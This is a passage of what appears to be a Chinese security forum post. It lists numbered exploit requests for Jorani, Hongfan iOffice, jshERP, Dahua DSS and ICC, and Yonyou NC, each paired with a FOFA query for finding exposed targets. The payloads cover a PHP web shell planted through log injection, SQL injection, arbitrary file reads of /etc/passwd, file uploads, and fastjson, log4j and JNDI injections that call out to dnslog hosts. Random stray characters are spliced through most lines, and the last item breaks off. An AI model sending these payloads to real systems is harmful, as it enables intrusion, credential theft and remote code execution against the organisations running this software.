: B6 W+ ^& t9 K- d8 C* h+ d4 WHost: 127.0.0.1
2 w- u3 W! x7 o9 A0 ePragma: no-cache' H7 W0 S1 Z3 H/ H; @4 ?, A$ ?+ i
Cache-Control: no-cache4 t0 e; H- f. i* n1 U6 S
Upgrade-Insecure-Requests: 1 z) k7 Z5 v: t) O) H; R& @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* U; `* r) g ]) {% e6 \0 u: i+ {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.79 |. m- y, Q- s. a* _
Accept-Encoding: gzip, deflate, F! t0 Q3 d+ e7 h/ F( e. {8 M
Accept-Language: zh-CN,zh;q=0.9,en;q=0.83 j; Z/ \4 I" t' ]* U; W2 R
Connection: close
0 o- n) K) T v" w/ f3 e, i# s" q+ D: z" _2 u. C
8 \2 n4 R! j. C' g; y' Q$ a) M12. Jorani < 1.0.2 远程命令执行
, z) k) e- R- P) A" t8 DFOFA:title="Jorani", o# E! K, \7 ?. W# c& I. |
第一步先拿到cookie
& Q5 L6 B) N5 M1 u/ U5 v% p5 k" ^: ]GET /session/login HTTP/1.1
3 l) v u- u8 \ |: V. K' gHost: 192.168.190.30" Y: {; g3 g4 X. X( t
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
# U& w1 c/ L1 o3 G( M1 QConnection: close/ k" e7 j( X8 ^- H, g
Accept-Encoding: gzip
3 T& d J, `: l1 m: [1 A) c3 `& x
' |( e" R4 n4 C& k) U
) L3 f2 `* ]5 O8 \, w6 d# @) Q响应中csrf_cookie_jorani用于后续请求
; j' S& Q6 H0 ~0 w& H: \HTTP/1.1 200 OK* c; J f, Y* S7 Y6 ?4 A! c
Connection: close
# _. t7 z4 C& T( @Cache-Control: no-store, no-cache, must-revalidate
9 v' q% g- y' M: O1 R$ {Content-Type: text/html; charset=UTF-82 L$ ~1 u' |6 C/ E" R. d/ R1 E& x
Date: Tue, 24 Oct 2023 09:34:28 GMT$ O6 k0 L6 ^& D) K. h
Expires: Thu, 19 Nov 1981 08:52:00 GMT) t' z3 e6 i6 z8 _
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT i- \: x4 {- ~) u
Pragma: no-cache! V. |/ S2 F' C" ]# N) s
Server: Apache/2.4.54 (Debian)
: x4 m4 c" p {& r3 C0 `+ hSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/ q- l W* h6 W
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
" i( {1 S& Y8 zVary: Accept-Encoding
1 B. v8 ` E8 ?. G2 a f& m6 }. I2 d' N
& q9 n" I1 T. }: F& a" ~5 k+ z* ~
POST请求,执行函数并进行base64编码+ R/ _7 w+ ?! _! H3 R i
POST /session/login HTTP/1.1) a: N4 x' r5 q- o
Host: 192.168.190.301 b) f+ U C5 _ t. R4 p* ]( n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% Z i8 {! P; F% |& KConnection: close: E( X) z# g$ E4 R: W' H
Content-Length: 2529 \! y/ m V$ P; x) I) K, B
Content-Type: application/x-www-form-urlencoded$ _" I9 Y5 n( P- @
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
8 |. ?6 X5 N( v: H. iAccept-Encoding: gzip% N0 h( c6 M- E
9 w/ J& T# I: B+ A
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor& t$ a% g+ g, A* a2 C/ e
; ]* {6 u# e( w3 p$ k# N
* \. a4 A9 Q' ?) b+ ?, i' c4 d
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串& H0 L- d+ N6 E b( n9 Y
GET /pages/view/log-2023-10-24 HTTP/1.1
8 C+ y: o' i; Z( g5 FHost: 192.168.190.30& Q- [; }, g+ ]1 M2 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
& ]& R, Y( |' U% |9 f3 YConnection: close
! v( l; P/ e/ z3 s+ H: j2 [Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
& l3 t& \$ p8 ~8 z- H% fK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=' O. C3 P$ W4 J8 J( {* a/ ^
X-REQUESTED-WITH: XMLHttpRequest; k5 l6 ~. ^3 `9 d7 k' F( h* T, o
Accept-Encoding: gzip; f4 G7 t$ x1 ~4 I$ n4 G
& ~9 f# l8 y/ H9 ?5 E& w) b2 p5 a0 j4 c
13. 红帆iOffice ioFileDown任意文件读取0 Q/ q% U& }8 z
FOFA:app="红帆-ioffice"
5 p) Y! g/ f1 [6 z% |GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.15 P4 D- V' f9 o
Host: x.x.x.x
+ d6 a ^; Z! xUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
; j* H- J ^) G. GConnection: close
2 L: Z* n) @4 x: Z8 k+ h# c6 V* YAccept: */*. Q9 l& Q3 V. W' v/ E) M/ v# ~
Accept-Encoding: gzip
4 u3 u: [; T* v+ M$ t$ A) l+ N4 U3 F. Z* k* k; J0 M' \
R3 K2 b0 d |0 ~1 I2 h
14. 华夏ERP(jshERP)敏感信息泄露
! J2 C5 n/ a+ `1 [$ k P' lFOFA:body="jshERP-boot"1 e6 n, G- L' Y4 ]* X( R5 Q9 \6 E: A
泄露内容包括用户名密码. d& {( }5 z. K) q; p
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
' s, H' m8 d- YHost: x.x.x.x5 ] F2 @5 s. ~& L% J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
2 z( M9 t. p( A8 N) z0 a* nConnection: close
C3 y- v! U* a( S& pAccept: */*) f) v* |( W) M* ~
Accept-Language: en0 a: g5 D( u/ f* S8 [4 i" |0 p \4 m. ^3 a
Accept-Encoding: gzip
( g" c- d% ?7 r% @- O
5 b$ P8 _& A( `7 D) Z A
$ g5 p; n' p/ V9 j t; U15. 华夏ERP getAllList信息泄露
3 f6 P3 N$ K3 o3 C4 b4 j) u" UCVE-2024-0490: e+ ~6 h, ], X9 J' I% D o" C! X; n
FOFA:body="jshERP-boot"
3 v# K; B$ a& |0 L+ S4 U泄露内容包括用户名密码+ t7 l% ~* T( u% L N% ^! e. ?
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1! D3 {- D' K5 i! P
Host: 192.168.40.130:100
' w% p C, x, v" N$ i/ Z: NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36: W3 f2 o- |8 H/ ]7 ^' x! d* I
Connection: close
2 F, L5 W6 R* t8 g# ]9 D P# mAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+ K; f/ g5 z$ |7 j# f) r. yAccept-Language: en
" g) L2 N1 {- D* Psec-ch-ua-platform: Windows: t H% D. `3 N! y' P
Accept-Encoding: gzip, Y0 S9 q' a, D5 U) n5 f( q
D) K; [9 o3 o" O7 Z/ n
& H- J1 {7 h$ a! ]) B
16. 红帆HFOffice医微云SQL注入
$ h$ }8 Q# H, [$ ]1 _& oFOFA:title="HFOffice"
- ^8 u# ?! i# F+ z& [6 Jpoc中调用函数计算1234的md5值
+ t! M8 i: Z8 |( ]: W8 v+ XGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1' i4 M, y: L* u# B* _
Host: x.x.x.x0 [$ t$ z$ o; n! f
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.366 ~, }) d+ Y# B( y7 X
Connection: close2 r$ b$ ~" B- R5 X# a; Y
Accept: */*
" S) H& i6 m p, Q) J% A: MAccept-Language: en
. \' `7 M2 M8 x4 ZAccept-Encoding: gzip& ~- |4 q" W* m* q3 Y
Z. S7 ~# n8 t0 D% [( \
9 H* x+ X# L, O) S+ l/ C1 V17. 大华 DSS itcBulletin SQL 注入; u% M6 J+ J7 l: f- X' a0 s: i' I
FOFA:app="dahua-DSS"* a- M6 }) E& q+ V# |
POST /portal/services/itcBulletin?wsdl HTTP/1.1% P( q. w6 X! K( {* U8 s
Host: x.x.x.x
: g* I* S$ @1 R! |6 q% ZUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.152 n. D" a* {8 D
Connection: close
$ G2 ~' O, J( g4 Z5 W6 G3 eContent-Length: 345
5 z3 j- c! f* F: m! }( {6 a6 vAccept-Encoding: gzip4 u- y" ~/ Z* n) V3 m3 p+ [, D
+ s* A0 E) ?3 [+ W4 i1 ]<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
* x* h2 ^# n+ o% V) p<s11:Body>, _2 {7 l/ Q8 e
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
+ w3 W6 Z; w! h9 r3 |, u7 D <netMarkings>
3 O+ |" _. L4 T) N5 x. b (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
$ N; c0 }8 ^2 p4 b0 { </netMarkings>5 |# F J0 |" x4 d* ?: l
</ns1:deleteBulletin>, c. I& O( F8 {- H$ F8 h2 Q7 L
</s11:Body>( r1 h' Y3 q. Q) Z$ b; b- Y$ @$ z1 j
</s11:Envelope>) @3 | Y+ Q- q. s
, P' y: W+ G9 a/ w' j# O
9 | \$ I3 u$ ] q6 o. W
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
- t5 {2 v ~- q8 U: f2 ?FOFA:app="dahua-DSS"
" c1 O8 B" T$ g- F1 @GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
9 {' B% k7 p( `7 x9 p* n# wHost: your-ip; t, V' b8 |" C: B p' C/ i7 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ s' L, y; g! ]5 G ?
Accept-Encoding: gzip, deflate0 d- q {! C. J# m# j
Accept: */*
/ l5 ^7 ?2 c$ A! R6 JConnection: keep-alive
4 n6 r- v8 M6 P6 L4 o# H1 m6 |/ x: ]( |) A. D# ~5 a% f
. z& b, \& g; |8 [2 v. c
$ P) I2 l0 M0 ^$ ]7 J0 W- e19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 B- r! R2 m3 @( p3 ?FOFA:app="dahua-DSS"; P" S& H% X% w& E) P% k
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
. [4 l$ k( U/ |' x3 g) v0 ~7 p- fHost: |. o3 ?2 H: y( U8 z
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.360 d6 n; C* V, M$ Z, T0 Z% S
Accept-Encoding: gzip, deflate
6 j, F) H* G2 y" R+ ^Accept: */*4 k& D- e' M/ }( _7 e
Connection: keep-alive
' |, U' {( ^% u% E
7 m/ }' G# j& S8 y1 M- U2 k7 F$ y# _9 y
20. 大华ICC智能物联综合管理平台任意文件读取4 s* S- q; C* l/ U+ x/ C
FOFA:body="*客户端会小于800*"9 Z) s+ y& Z7 q; f
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
+ f {3 @3 U$ D# v0 bHost: x.x.x.x s! [# f. Z4 m
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
, u! |! X6 I% R k# O- b' m4 W! LConnection: close
. |4 ~3 e7 P: K6 T1 n1 W9 P1 b# JAccept: */*! O* {3 ]1 h3 T) e3 e
Accept-Language: en
5 G; `+ R, i2 s& u7 \Accept-Encoding: gzip
- M/ y4 G# a) J, Y: e( O& I
1 a5 p- B. W" F' m4 _4 s7 v* d7 {9 F$ J
21. 大华ICC智能物联综合管理平台random远程代码执行- x; R g8 `2 X& h7 |
FOFA:icon_hash="-1935899595"
; k, T2 N" f/ n0 d/ V9 s9 c; YPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1! R- f* ]6 ^" n+ I& B i# v; N S
Host: x.x.x.x
) R; I8 q) R+ |# M# C3 \6 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. ?; d3 E& a. O0 r: ~ d, M5 f+ {" ?Content-Length: 161
( G8 D: w7 e; D" i$ qAccept-Encoding: gzip
- U) J7 f/ \4 p( f' w- OConnection: close$ Q9 {) }/ ]% [+ N
Content-Type: application/json;charset=utf-83 T5 A) W0 T5 Q9 Y3 b8 E4 {
( d4 x8 o1 ^0 c
{
4 F% u! x! }) M6 G$ w"a":{8 ^' r& D4 i+ R% w- r
"@type":"com.alibaba.fastjson.JSONObject",/ p3 s; N) @: X- m' m8 A, f; N
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
( N# q; X- R+ F1 t- _& ~: X }""
' _) L( I1 ^9 \. R}
1 H1 Q: r- \# p I! q# O! ]/ n. b4 o/ G+ o& M9 o9 `
$ o t2 K5 x/ h4 d k1 y22. 大华ICC智能物联综合管理平台 log4j远程代码执行- y; G1 J7 d! u1 r( [, E
FOFA:icon_hash="-1935899595"
9 w: U* K. s8 P5 U% F7 B% rPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
3 X3 M) K8 ?# J m4 UHost: your-ip
; G/ ]* C$ r" B: D( u5 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
/ s" Y& k* [ x9 t- m# uContent-Type: application/json;charset=utf-8
. o, y, ^* C2 q, O$ }3 j3 t0 M& P" i& z* G. T5 h6 p
{
0 {+ o, `# @+ y' M1 f2 J; P0 U"loginName":"${jndi:ldap://dnslog}"/ y; V. k9 y4 p0 G$ D0 ?+ Q- x* \* c
}
" A: ^* e- Z( K$ t6 x
' A) t+ i# E: |
7 X/ p, O' {3 p
+ g9 u. {0 d' [0 q" f! D23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
% n, k3 x9 h0 B7 f+ g0 I* V9 IFOFA:icon_hash="-1935899595"
" L4 w" J B+ Q4 x! kPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
1 N5 J3 l# H& e. l, Y# I( {6 F) E8 eHost: your-ip
4 Z. U) A t$ e2 W0 X3 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
`! g3 z( Y3 [7 N+ f0 F5 YContent-Type: application/json;charset=utf-8# [" H6 g8 P0 d: }- u
Accept-Encoding: gzip$ e0 N' G. _& j
Connection: close
( d2 ]$ u) r+ P6 {/ {- D ~4 Z% E0 W
{* G; y, M4 x; i- j
"a":{5 g* V/ H) ~# q' ]; U( [4 @
"@type":"com.alibaba.fastjson.JSONObject",
0 E( V+ M; [& f2 q( } {"@type":"java.net.URL","val":"http://DNSLOG"}2 c7 M0 B3 {1 i0 a
}""+ N/ b. A. p9 o r
}
. ?, u# z- V5 Y$ h. C! ~5 x0 z5 r, n% q# K8 b% o- _$ G$ I
( ~, Y, T { m- L7 K
24. 用友NC 6.5 accept.jsp任意文件上传. x+ {* a; O( w6 L8 B* x A! Z9 K
FOFA:icon_hash="1085941792"2 @4 ^( ?- p# Y2 q6 ]+ y9 }( x7 I
POST /aim/equipmap/accept.jsp HTTP/1.1
; f i4 v4 W8 j7 `Host: x.x.x.x# T/ A( `$ @! U/ |% Z
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36% x$ r1 S1 s, i' V3 O
Connection: close
; [* A+ N3 b% s9 P: w/ m/ gContent-Length: 449# w1 c6 I" k7 E
Accept: */*- z, `4 A; G. a2 t
Accept-Encoding: gzip5 ~& U8 k0 x8 _& B
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
- v7 o0 M/ ? @% J
! E$ o- I5 T+ k( `* N; c- r-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc+ j& D1 Q: }; g0 U3 j, Q+ r: {
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"# {. c! r' ?4 J
Content-Type: text/plain/ T* ]) U8 n) I! ^
4 E" ^8 J" U* m; l% T
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
9 x1 h. V$ C" v-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' v# r+ {! {# {/ B
Content-Disposition: form-data; name="fname"
& V+ r! R; s1 ?% p4 a7 l# _! U9 [+ N
6 s! f8 s9 w2 W\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
H7 X1 o. b: c0 }4 o-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc-- t8 `+ J* M( u) K
0 S) @8 x5 b: @) s& S
1 m8 C. t+ a6 ~3 S6 i25. 用友NC registerServlet JNDI 远程代码执行0 L! i/ u5 k6 x: i( i+ j
FOFA:app="用友-UFIDA-NC"
5 V) s' B# P/ ^+ ^) n0 aPOST /portal/registerServlet HTTP/1.10 c4 W8 w. f8 b9 W
Host: your-ip
0 I) d/ R) u- \) h9 G# T$ z3 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
5 L$ t5 U* L1 f `$ F! v4 `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9, ^1 c9 z* _# M% \6 S6 @
Accept-Encoding: gzip, deflate
4 S( E) R O. t0 C- M. J( K1 hAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
5 J, O. ~8 c' d' M! V6 hContent-Type: application/x-www-form-urlencoded4 [. Y- t; x) D/ v, |: }# c
, s( N9 j L, H2 K
type=1&dsname=ldap://dnslog0 C7 B' V/ [; y% q
- @8 k L' O- H! ?/ g& b
' M3 B1 P, T; H- e* H
! C: y, e- E8 ~8 }; h+ q9 n
26. 用友NC linkVoucher SQL注入0 P+ d. ~, w5 k: G% a$ s
FOFA:app="用友-UFIDA-NC"" Z& {. G( ]: R1 |
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1# e: J: ]9 f+ ]: M
Host: your-ip
# M8 z2 p4 I4 k8 z5 j; d5 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.368 E3 N3 p2 Q W5 d
Content-Type: application/x-www-form-urlencoded4 [: `/ g7 O$ s* L' W# e5 M
Accept-Encoding: gzip, deflate
+ H. m$ p& r1 _$ m. Q3 pAccept: */*: ?3 ~. n: E: F- \9 W E- R; \
Connection: keep-alive8 h x) z% M3 i2 O* o) k
+ O* H Z) ^! b' ?, j% H/ J
* u; O2 W4 Y( @) l& f
27. 用友 NC showcontent SQL注入. m r0 ?( h- }! G3 I$ S
FOFA:icon_hash="1085941792"1 W: Z" t" i j. r* J# q
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1" l) i, ^- O4 a/ f9 B( {& v
Host: your-ip
- X) G! Y U1 ?. F$ YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; Z1 l2 b7 J: k. c% j7 \7 y( r9 B6 q' @
Accept-Encoding: identity
! o0 A$ J1 B1 vConnection: close
; D9 [5 a. B$ TContent-Type: text/xml; charset=utf-8
9 p3 r2 S; D2 m% R9 u: L6 K D: b: ?% C' M. T# e
; Z) s* _- A. N# R28. 用友NC grouptemplet 任意文件上传5 L) R2 Q; c% D8 a: l- v
FOFA:icon_hash="1085941792": L) P: I; p! Q1 n
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.17 G' P/ U* R' c3 H
Host: x.x.x.x7 P4 \8 A4 x, o, f
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.364 W' B: D. r- F$ ^! ~( {
Connection: close' L$ M* a" D+ w& X- d
Content-Length: 268
# p. V( X' a; I7 \. S' G2 |2 z4 ZContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk0 y+ F n6 V' s
Accept-Encoding: gzip
% B4 n( d1 K5 I# ?/ o K
( U5 r( c5 u0 ~7 e; J# l0 w------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk w. ]- y& m/ I" |) b7 k. \
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"& n9 f! d* ~/ V
Content-Type: application/octet-stream2 o" L g& f- n$ t5 m6 t* p
( l. X2 f- e, `" k
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>2 E# `/ h6 p& K2 u
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
[; k) e5 K0 i9 O' k0 }
1 E, ^2 |. h0 Q1 f n
. B, \6 o6 f' M" B: }) L/uapim/static/pages/nc/head.jsp5 x" [4 {: a9 l
5 ]* F' ?* e4 n7 d29. 用友NC down/bill SQL注入6 U( G, k8 D9 r) x# u; s/ r
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"8 v2 a; J7 x% n$ T
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
' M [& \4 J) I! z$ D( B) IHost: your-ip( Z' E. m6 w; i' ? J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 p% y @$ ?* F7 n8 L% sContent-Type: application/x-www-form-urlencoded! ^ B" d% t+ @9 z7 g
Accept-Encoding: gzip, deflate
6 f% f' l- q& mAccept: */*
7 a% F& G: K* x/ UConnection: keep-alive Z3 L* |' e' [$ d! Z8 n! P
% Z- w4 u9 H7 a0 b" }9 k6 J S
, H$ t5 @/ H$ S: `' R$ ~( N30. 用友NC importPml SQL注入
3 N% m" e( R; S V1 |FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
' c, T% g0 `; [ \9 A* }2 V2 WPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
7 O/ `/ k5 c$ g, ~& t+ YHost: your-ip" w; A1 C" P+ @0 b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
! L3 c$ N8 K5 L( H; \3 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36* w/ m: K8 d' f# x3 M# _
Connection: close
$ \4 x. J4 h$ [+ N L7 ?6 x: Z) O+ _( G. [2 D# J5 |) \
------WebKitFormBoundaryH970hbttBhoCyj9V/ ^4 E, }5 a9 l6 H+ W7 }' p
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"* a! F) U- ?; V/ b. r
Content-Type: image/jpeg
8 ^* n! R* f& Q3 b------WebKitFormBoundaryH970hbttBhoCyj9V--
2 |& {3 A" o# F9 k8 W! C' C x6 E* O# I- J3 Z A) `, ]
# g9 V7 Z! i7 r; C31. 用友NC runStateServlet SQL注入' N6 y# Z4 D0 s" l) D
version<=6.59 U, V; S4 D/ b+ [5 L8 E2 G
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
% d/ B+ G6 @( b/ @/ W4 v: Z; \GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
, S* a8 l; N/ i' s$ D; FHost: host
. U4 O7 Z( L1 Q Q( bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36& f- v# t! A6 T" l$ R
Content-Type: application/x-www-form-urlencoded
3 G" p+ g* G0 x/ |+ Z- `; g/ M( U \9 G4 Z0 z" t7 F, n+ i
. e+ y/ |" [* ], `% d! f( h" a
32. 用友NC complainbilldetail SQL注入
- h( Y: T1 L! ~3 o: [5 \version= NC633、NC65
6 \0 n# j1 R/ ]" a" G5 H5 H6 u& ZFOFA:app="用友-UFIDA-NC"
. V" q( X: I- Y. MGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. u* K$ B, w) E6 r& `Host: your-ip
2 e( ~% v R0 D u2 n" W0 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ g$ O' S. _" a9 DContent-Type: application/x-www-form-urlencoded( c8 O' h% Z- F% u7 G. G& m
Accept-Encoding: gzip, deflate7 u& d8 @) a% G# v. V/ X3 {
Accept: */*7 \- Q# A* Y# c- I( m
Connection: keep-alive7 r# H3 y' I$ H
- t* s2 n% d2 E3 y$ m1 |9 `! T9 @, y9 X
33. 用友NC downTax/download SQL注入
* s! C& L( J9 @, f! n5 eversion:NC6.5FOFA:app="用友-UFIDA-NC") Z/ m. E D" f5 R$ H V% n, p
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
. M# l7 U$ a0 E9 x. f' ^# P$ O) lHost: your-ip
7 |/ ? ~0 Z; |# sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 z4 v8 ^% S# |3 S
Content-Type: application/x-www-form-urlencoded2 d4 v4 a7 s6 o x
Accept-Encoding: gzip, deflate
$ C4 L6 r% V1 D/ ^0 yAccept: */*
' k2 K1 a; G; a; AConnection: keep-alive
$ g) N. I2 C" L0 r8 ^7 @% X5 Z0 t
1 A' e* q# A. @* J# H ]
34. 用友NC warningDetailInfo接口SQL注入
- a- E' z) w% S8 ^) I4 B- RFOFA:app="用友-UFIDA-NC"# C! M( H v7 Q# Q. `
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
8 g1 Q7 e1 }6 h, X$ D' VHost: your-ip
$ \7 O" m- s5 f: z AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; z( N6 u! G, j6 A3 e
Content-Type: application/x-www-form-urlencoded
7 a! [' w- S& u O; y7 bAccept-Encoding: gzip, deflate# O0 u6 N* S0 u, n$ ^
Accept: */*
7 B: P0 n- s! B' Q+ EConnection: keep-alive9 G" q" o" I' U! s! t2 T" C
6 z# D9 c( L- c2 J: a4 w
/ R) F# G, ]. Z$ h
35. 用友NC-Cloud importhttpscer任意文件上传* i0 k @# R/ w* h k0 v
FOFA:app="用友-NC-Cloud"
! r$ @9 n0 Z! ~3 k6 {# KPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
& Y- N" T" ^& _+ @2 [: \- pHost: 203.25.218.166:8888
, v$ N# Y' _: D7 i6 rUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
